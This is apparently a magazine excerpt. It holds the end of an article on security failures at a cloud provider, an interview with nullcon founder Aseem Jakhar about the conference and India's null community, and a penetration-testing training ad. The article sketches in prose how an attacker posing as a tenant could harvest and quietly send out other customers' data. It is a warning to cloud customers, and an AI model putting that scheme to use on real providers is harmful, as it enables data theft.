understanding on how they came about. Let me 
describe the evolution of a real "Cloud" provid- 
er environment. This environment included over 
7,000 servers (bare metal and virtual) and was 
spread over 15 data centers. 

In this particular example the "Cloud" offering 
took the form of IaaS and SaaS (Infrastructure 
and Software as a Service). A framework replete 
with policies and procedures for a secure offering 
was put into place. The policies may not have yet 
reached maturity but at least there was some effort 
made to provide for some basic security and com- 
pliance needs. The real problems began due to a 
lack of understanding by leadership as to the re- 
quirement to maintain the security framework even 
under duress. When any network or server prob- 
lem occurred (severe enough for the customer to 
complain about it) members of leadership "pulled 
out all the stops" as it were and demanded imme- 
diate action to resolve the issue directing that re- 
sponse personnel perform tasks that would com- 
promise the integrity of the security framework. 
These included opening permissions up to Read/ 
Write/Execute for Everyone in case permission 
restrictions might have been part of the problem. 
This was always done as a "temporary" fix to be 
corrected later but "later" never seemed to come 
and more pressing matters always precluded re- 
visiting any issue that was deemed "solved" from a 
customer complaint perspective. 

The result became a "Swiss Cheese" network and 
server environment where almost all security mea- 
sures had been circumvented or negated by "quick 
fixes". Further, the nature of the "cloud" is that many 
IaaS and SaaS environments are multi-tenant and 
the removal of security controls in one customer en- 
vironment often results in exposing several other 
customers' environments to attack as well. 

Another common practice in this particular en- 
vironment was to allow the customer to write their 
own API calls in to the environment to extend the 
functionality of the SaaS environment. Because 
of this need, the customer was often granted un- 
necessarily lenient rights and access in the shared 
multitenant environment housing many other cus- 
tomers' software and data. To further exacerbate 
the issue, there was no code review performed on 
customer code so programs with elevated privileg- 
es were allowed to run in the shared environments. 
This exposed all customer code and data in these 
shared environments to potentially malicious code 
as well as untested code that could cause acciden- 
tal destruction and outages. At one point, there was 
a code review board set up, but time constraints 
rendered them useless as they were not given time 
away from their regular duties to spend the time 
necessary to thoroughly review the code before it 
was run in the shared environment. The result was 
a "rubber stamp" approach to code approval. 

DNS Services were perhaps one of the great- 
est risks the "Cloud" provider faced. They were run- 
ning standard DNS on Microsoft Domain Controllers 
whose versions went back as far as NT4 Server. 
Additionally, over 180 personnel had admin access 
to the DNS Servers and zones. Many were contrac- 
tors, some of which no longer worked for the provid- 
er. Almost every DNS server had direct access out to 
the internet and forwarders were configured to sever- 
al upstream servers. There was no overall DNS strat- 
egy and many zones were duplicated. Many host 
entries actually pointed to servers in China and Rus- 
sia (evidence of compromised DNS). Upon monitor- 
ing it was found that over 90% of all DNS queries 
were failing. All of this was kept from the customers 
of course. Remediation efforts were hampered by 
the fact that no one had documentation or a real un- 
derstanding of the 250 plus DNS Servers running or 
which ones were performing lookups for which cus- 
tomers. Constant packet sniffing and monitoring had 
to be performed for months to watch all port 53 traf- 
fic to attempt to map DNS workflow so remediation 
could occur without outages. The active directory de- 
sign that controlled access to various customer re- 
sources and environments was poorly designed and 
many multitenant customers were simply given an 
OU with delegated control over their own OU for ac- 
cess. Many customers then demanded Domain Ad- 
min access claiming they must have it to resolve an 
emergency or troubleshoot an issue and it was often 
granted. This now gave them the control over the en- 
tire AD Domain including the OUs of several other 
customers. Eventually, most customers had this level 
of access and so they had "god rights" to all customers 
in the multitenant environment. 

Additional risk to the "Cloud" offering came from 
the fact that there was much offshore support (not 
an issue in and of itself but security control at many 
of these locations was tenuous at best). The turn- 
over at the offsite support locations was high and 
often security controls were bypassed completely 
by staff at these sites that had demands placed on 
them by their local leadership. The demands often 
centered around expediency at the cost of follow- 
ing policy and procedure. On some occasions se- 
curity controls were completely circumvented for 
ease of use and convenience. At one location a 
back door internet connection was set up and a 
rogue proxy server installed to speed up internet 
speeds and bypass content filtering. 

Another risk that stemmed from this support 
model revolved around the access to the data 
center via a large scale VDI environment. The off- 
shore support teams accessed the production en- 
vironment via a VDI framework (over ICA or RDP) 
which ostensibly was maintained for patch levels 
and hardened to provide secure remote desktops 
to perform their support functions. In reality, these 
remote desktop images were rarely updated or 
maintained because the support staff for them was 
"busy," which resulted in them falling woefully be- 
hind on patch levels and many vulnerabilities being 
exposed. Many of these were left up and running 
for years at a time and became infected with vari- 
ous malware and malicious code resulting in com- 
promised desktops with elevated privileges and 
access into customer production environments. 

Backups of customer data were encrypted at 
least but encryption keys to backup controllers 
for older data had been lost and much of the cus- 
tomer data could not be recovered if the customer 
demanded it. This caused an issue on one occa- 
sion but it was covered up by saying that particular 
backup tape had been corrupted and it would not 
happen again. Fines were paid for a minor SLA 
violation and life went on. In addition, the backup 
framework was severely oversubscribed and ap- 
proximately 30% of all backups failed each night. 
Plans were always in the works to upgrade the 
backup infrastructure but pressing customer mat- 
ters always seem to put implementation on hold 
and no substantive action was taken for months. 

Customers were never notified as breaches 
were found and more effort was made to cover 
up breaches and risk than to remediate problems. 
There were some rudimentary security controls 
and solutions in place and these were loudly tout- 
ed to customers who visited the facilities. The fact 
is that these were often misconfigured or that their 
scope did not even encompass the customer en- 
vironment and this was never mentioned. Most of 
these solutions were nothing more than a smoke 
screen to appear secure but had little benefit to the 
customer data or environment. 

A simple way to perform a comprehensive at- 
tack in this environment would be to start a small 
company and subscribe to the cloud provider as a 
multitenant customer. This could be done with lit- 
tle initial investment by a group of hackers or by a 
state sponsored team of hackers. Then you could 
perpetrate complex attacks over time utilizing the 
multitenant environment and elevated privileges 
to access data from many customers harvesting 
millions of dollars' worth of data. Additionally, you 
could write code that would exploit the environ- 
ment and have the "Cloud" provider run the code 
in the multitenant environment as well. The code 
could harvest data over time and send it out in 
small encrypted packages over SSL to your exter- 
nal servers or back across your partner connection 
to the provider to your internal servers. This could 
easily be disguised as legitimate traffic. 

So what can be done to secure your data and 
compute within the cloud? Knowing all this, can you 
expect to store your data in a public "Cloud" with any 
hope of keeping it secure? Are "Cloud" providers' 
assurances of security enough to ease concerns? 

The obvious conclusion from all of this is that you 
cannot assume a secure place for your data and soft- 
ware in the "Cloud" if you do not control the "Cloud" 
environment. The best you can do is to demand to 
examine and audit the environment in the "Cloud" but 
you or your auditors may be met with a "guided tour" 
approach where shortcomings are concealed and a 
façade of security is presented. One possible solu- 
tion is to encrypt your own data before it enters the 
"cloud" but even this is not guaranteed. If you have or 
process sensitive data I would strongly advise host- 
ing your own "Cloud" and not sending it out beyond 
the bounds of your direct control and review. 

EDDIE MIZE 

Eddie Mize has worked in the IT field for 
over 29 years and in Information Security 
for over 16 years. He has performed nu- 
merous Red Team operations and taught 
several classes on Red Team techniques. He 
has spoken publicly several times on Secu- 
rity and Compliance. He has performed penetration test- 
ing and Red Team operations for organizations with as 
many as 8000 servers and 15 data centers. Eddie enjoys 
speaking at DefCon and is on the staff for the conference. 
Interview with Aseem Jakhar 



Ewa Duranc, Hakin9 Magazine Editor 
speaks with Aseem Jakhar the Founder of 
nullcon Security Conference. 




Ewa Duranc: Can you introduce yourself to 
our readers? 

Aseem Jakhar: I am currently the Director, Re- 
search at Payatu Technologies, a security services 
organization with expertise in product/application 
security assessment. I have 9 years of experi- 
ence in system programming, security research, 
consulting and managing security software devel- 
opment projects. I have worked on various securi- 
ty software including IBM ISS Proventia UTM ap- 
pliance, messaging/security appliance, anti-spam 
engine, anti-virus software, Transparent HTTPS 
proxy to name a few. I am an active speaker at various 
security and open source conferences including 
Defcon, Hack.lu, Blackhat, Xcon, Cyber security 
summit, Cocon, OSI Days, Clubhack, Gnunify. I 
am the author of the open source Linux thread injec- 
tion kit Jugaad and of Indroid, which demonstrate 
a stealthy malware infection technique on desk- 
top OS and Android. I'm also known in the secu- 
rity community as the founder of null - The open 
security community, a registered not-for-profit orga- 
nization (http://null.co.in), the largest security com- 
munity in India. 

ED: Ok, Let's talk about nullcon Security 
Conference. What was the idea of creating 
it? 

AJ: nullcon was founded in 2010 with the idea of 
providing an integrated platform for exchanging 
information on the latest attack vectors, zero day 
vulnerabilities and unknown threats. Our motto - 
"The next security thing" drives the objective of the 
conference i.e. to discuss and showcase the future 
of information security and the next-generation of 
offensive and defensive security technology. The 
idea started as a gathering for researchers and 
organizations to brain storm and demonstrate why 
the current technology is not sufficient and what 
should be the focus for the coming years pertain- 
ing to information security. In addition to security, 
one of the sections of the conference called De- 
si Jugaad (Hindi for "Local Hack") is dedicated to 
hacking where we invite researchers who come 
up with innovative security/tech/non-tech solu- 
tions for solving real life challenges or taking up 
new initiatives. 

ED: What are the type of events that 
happen at nullcon? 

AJ: nullcon is a 4 day summit. The first two days 
are dedicated to security training given by re- 
nowned security experts, followed by a two day 
conference which comprises talks, workshops, 
hacking competitions, villages and after parties. 

Hacking Competitions 

We conduct three different types of hacking chal- 
lenges: 

• HackIM - The pre-con online competition 
(http://ctf.nullcon.net). The first three winners 
get free VIP passes for the conference. 

• Battle Underground - It runs during the con- 
ference over the cloud, so people who cannot 
participate in nullcon also get to take part in 
the challenge. 

• JailBreak - We started Jailbreak in 2012. It 
happens two days before the conference and 
is a 36-hour continuous in-house competition. 
The participating teams are kept under house 
arrest. They are given a main objective which 
can be either writing exploits, tools or finding 
vulnerabilities in software products. During the 
challenge the teams are given small puzzles 
to solve after every few hours and the team 
that cracks the puzzle first is allowed 15 mins 
to move out of their room and use the toilets, 
cook food and eat. The team that finishes the 
challenge is allowed to break free from the Jail. 
All teams are given 20 mins speaking slot dur- 
ing the conference to talk about their solution 
and the methodology used and the winners 
are selected by a panel of judges. The winning 
team takes away $$$. The last Jailbreak was 
amazing and we also shot the videos of the 
competition. Folks who are interested can take 
a look at: 

• JailBreak Teaser - http://www.youtube.com/ 
watch?v=xciUR9fUarU 

• JailBreak Episode 1 - http://www.youtube. 
com/watch?v=2Ehrv0_6wB0 

• JailBreak Episode 2 - http://www.youtube. 
com/watch?v=78GLbFVOb3g 

Workshops 

We are introducing workshops in the upcoming 
conference. The workshops will be free for the 
attendees and run parallel to the talks. We have 
some amazing workshops lined up for nullcon Goa 
2013. 

Villages 

These are informal learning sessions on tech/non- 
tech subjects where participants get direct hands- 
on on different subjects such as hardware, robot- 
ics, smartphone OS. 

Networking parties 

We make sure that delegates get a good feel of 
Goa and can network with peers and speakers in 
an informal setting. 

ED: What projects are you working on? 
Can you tell me about them? 

AJ: Nullcon keeps us busy for a good amount of 
time during the year. Other than the conference, 
we specialize in security assessment for applica- 
tions/products/telecom/mobile. We also do cus- 
tomized security training and consult on Secure 
SDLC process. Our clients include financial insti- 
tutions, security appliance, online product compa- 
nies, healthcare, telecom operators to name a few 
in Asia and Europe. 



ED: Nullcon Events date from 2010. 
What topics do you cover during your 
conferences? Who attends them? 

AJ: We focus on upcoming and next generation 
offensive and defensive security technology. The 
topics range from APT, Cyber operations, to ex- 
ploitation of different technology and systems, 
cloud, telecom, hardware, web etc. We welcome 
anything new, interesting and that has a significant 
impact on security. 

The attendees are a mix of researchers, execu- 
tives, students and Govt. officials. We get a very 
good participation in terms of footfall from the 
Govt. sector in India. It is good to see that things 
are changing in the Govt. sector and officials are 
realising the impact nullcon has in the overall de- 
velopment of information security awareness in 
the country. The awareness level in the corporate 
sector is also increasing every year. 

ED: Let's move on to the upcoming 
conference? How many speakers do you 
have? 

AJ: Nullcon is not just a conference, it's an expe- 
rience by itself where we celebrate the achieve- 
ments of the security community with a lot of cut- 
ting edge learning. 

There are a few new events in the pipeline such 
as pre-con night hack talks, hardware villages. 
Various events during the conference include 

Talks 

We have more than 20 speakers with some really 
amazing content. 

Reboot Film 

We are honoured to have Joe Kawasaki, Director 
of reboot film at the conference where we will be 
showing the movie along with a Q&A session with 
Joe. 

Hacking Competitions 

• HackIM starts in mid Jan 2013 http://ctf. 
nullcon.net 

• Jailbreak will be held on 27-28th Feb 2013 

• Battle Underground will be held during the con- 
ference 1-2nd March 

P-A-R-T-Y 

A break from the high tech learning in the day to 
give you a good dose of Goa. 

• Speakers after dinner party - An informal wel- 
coming of all the speakers. 
• Nullcon networking party - An invitation only 
party for speakers, volunteers and the Corpo- 
rate delegates on 1st March 2013. 

• A visit to Saturday night bazaar - An open 
air flea market, bars, DJs, Live bands on 2nd 
March 2013. 

Exhibition 

Yes, we have a full-fledged exhibition for security 
companies to come and showcase their products 
and services. 

Job Fair 

As part of the Exhibition we also organize a Job 
fair booth and assist organizations look for skilled 
professionals. Attendees drop their resumes and 
we share it with the organizations participating in 
the conference. It is a very economical and easy 
way to find the best resources in security. 

Workshops (1-2nd Mar 2013) 

• GSM Exploitation by Aaron deMello 

• Understanding Smart Malware by Shesh Sa- 
rangdhar 

• Introduction to Peach fuzzing framework by 
Adam Cecchetti, Deja Vu Security 

• Memory Forensic by Prince Boonlia 

Training (27-28th Feb 2013) 

• Penetration Testing SmartGrid & SCADA by 
Justin Searle 

• The Art of Exploiting Injection Flaws by Sumit 
Siddharth 

• Xtreme Android Hacking by Aseem Jakhar 

• Reverse Engineering and Malware Analysis by 
Abhishek Datta 

• Xtreme Exploitation by Omair 

• Mobile Application Hacking - Attack & Defense 
by Hemil Shah 

• Xtreme Web Hacking by Akash Mahajan & Ri- 
yaz Walikar 

• Cyber Warfare Intelligence and Intrusion Oper- 
ations by Atul Agarwal 

If that's not all, the beach is right next to the ven- 
ue so you can take a break anytime you feel like 
and stroll on the beach. 

ED: Why did you choose Goa as the venue? 

AJ: In India we have been to many conferences 
organized in IT hubs such as Bangalore, Delhi, 
Mumbai etc. The problem we see is that the del- 
egates are not able to concentrate on the talks 
due to their office work and many delegates have 
to unwillingly depart to their office in the middle 
of the conference for some reason or the oth- 
er. We wanted a location where delegates will not 
be bothered about going back to office and can also 
take time out from their busy schedule and con- 
centrate on what they have come to nullcon for 
i.e. learn, network and relax. We found Goa as 
the ideal place to host nullcon. Goa is one of the 
famous International destinations which attracts 
a lot of tourists from all over the world and for in- 
ternational security professionals we add the con- 
ference twist to the place, so every year they can 
take vacation to Goa and enjoy both the place as 
well as the conference. 

ED: How has the security scene in India 
changed over the years? 

AJ: Drastically. I remember the time when there 
were no avenues to learn, meet and network with 
security professionals in India and the difficulties 
of finding good mentors, content etc. Year by year 
we see an increase in the number of paper submissions 
from local researchers with some really amazing 
research which is also admired world over, but 
was hard to find earlier. In the late 90s and early/ 
mid 2000 there were closed groups and commu- 
nities and the information exchange was limited 
to them. And then nullcon happened! It worked as 
a catalyst to the networking of the security com- 
munity here. On a lighter note some people re- 
gard nullcon as the infosec hippie revolution (in a 
good way) because of the counter culture that it 
has brought in the information security and hack- 
ing scene. 

ED: What is null - The open security 
community? Tell us something about it? 

AJ: It all started back in 2008, we and a bunch of 
colleagues were discussing about active informa- 
tion sharing platforms in information security do- 
main. India being the global hub of software de- 
velopment, it was a little surprising that there were 
no active and open infosec communities. This cou- 
pled with the problems we faced during our learn- 
ing phase because of no one to talk to, mentor and 
guide us. We thought of starting a community with 
no boundaries i.e. anything security and hacking 
was welcome. The aim was to share knowledge 
and assist any organization with security related 
issues. 

null was the primary inspiration to start the 
nullcon Security Conference. 

We started the null mailing list in July-Aug 2008 
and made our first public appearance at Bar- 
Camp Pune in Nov 2008, where we announced 
that we are starting physical null community meet 
ups in Pune. There were a few hackers and secu- 
rity professionals whose needs were answered 
by null and they joined in as volunteers. There 
has been no looking back since then. It has not 
been easy but has been a very interesting jour- 
ney. Null is now a registered non-profit society 
with over 2800+ members on the mailing list and 
more than 150 security professionals and hack- 
ers meet every month in different cities at the null 
meets. 

We currently have six active null chapters 
throughout India in major cities - Pune, Banga- 
lore, Mumbai, Delhi, Hyderabad and Chennai. Ev- 
ery chapter is run by 2-3 Moderators. The mod- 
erators decide the agenda of the monthly meets 
and make sure we have a suitable place for the 
meets. There are generally presentations by mem- 
bers and discussions on hot topics in security. The 
chapters run independently with all the information 
being collated on our community portal http://null.co.in. 
It is amazing to see the kind of deep tech- 
nical knowledge talks and information exchange 
happening at the null meets. The meets are free 
for everyone i.e. no registration and as we say 
at null - just come with an open mind. People in- 
terested in opening local null chapters can directly 
contact us and we can assist them with the same. 

ED: Do you work on any projects in null? 

AJ: We have several projects running. All projects 
are run by null members who have volunteered 
and taken some time out of their busy schedule to 
manage those projects. 

Software projects 

There are various open source security software 
written and contributed by null members. The de- 
tails can be found at - http://null.co.in/section/ 
atheneum/projects/ Some of the noted projects 
include Game|Over - The web security learning 
platform, Jugaad - Linux remote thread injection 
kit, Wireplay - server communication fuzzing tool, 
Malware analyser and many more. 

Project Keeda 

A database of vulnerabilities found in the wild. Re- 
searchers who find it difficult to report and get the 
vulnerability fixed, report it to us and we take on 
the responsibility of reporting it to vendor and get- 
ting it fixed. There is no restriction on the type of 
vulnerability one can report i.e. even vulnerabilities 
in custom websites can be reported to Keeda. For 
more details you can visit http://keeda.null.co.in. 

Null Jobs 

A free portal for posting and applying for security 
jobs. We have been running the portal for more 
than a year now and have received hundreds of 
job postings and applications. Many people have 
found the right jobs through the portal. We have 
changed the way how security job openings were 
communicated in the past by way of having a cen- 
tralized portal for most of the security jobs in India. 
We plan to take it international in sometime and 
assist the international community for the same. 
Details can be found at http://jobs.nullcon.net. 

null Humla 

Humla literally means attack in Hindi. An offensive 
hands-on informal workshop and gathering. This 
happens in most of the null chapters. It is a day long 
session on any offensive technology picked up by 
the volunteers. We have a Humla champion who 
runs the show. The session is totally free, however 
to maintain the quality we keep limited registrations. 

ED: Any message for our readers? 

AJ: I request you to come out of your office space 
and contribute to the community as much as you 
can. Believe me when I say that the best way to 
learn is to share and network with the community. 

Take some time out of your busy schedule and 
come down for nullcon. We promise an experience 
never experienced :). We have special packages 
for international delegates. 

And as they say for nullcon - Beware! Be There! 
Get ready to Goa! 

ED: Thank you very much! Good luck! 
Hack Defense

Emerging leader in Information Security Training & Services

Learn The Most Advanced Ethical Hacking Training - CPTP

The CPTP certification is quickly becoming accepted worldwide as one of the most prestigious Information Security certifications in the industry. Information Security Professionals holding an active CPTP certification are recognized for their expert-level knowledge and skills in hard core penetration testing. The deep technical penetration testing knowledge that a CPTP brings ensures that they are well qualified to address the most technically challenging cyber security threats and security vulnerabilities to Corporate Infrastructure.

DECEMBER 1-5, 2012

AMSTERDAM

APRIL 22-26, 2013

JANUARY 14-18, 2013

NEW YORK

JULY 1-5, 2013

For more CPTP Boot camp Locations visit - www.hackdefense.org

Corporate Training/Enquiries email - contact@hackdefense.org

Hack Defense, a brand name in delivering high end penetration testing training to top Fortune 500 MNCs.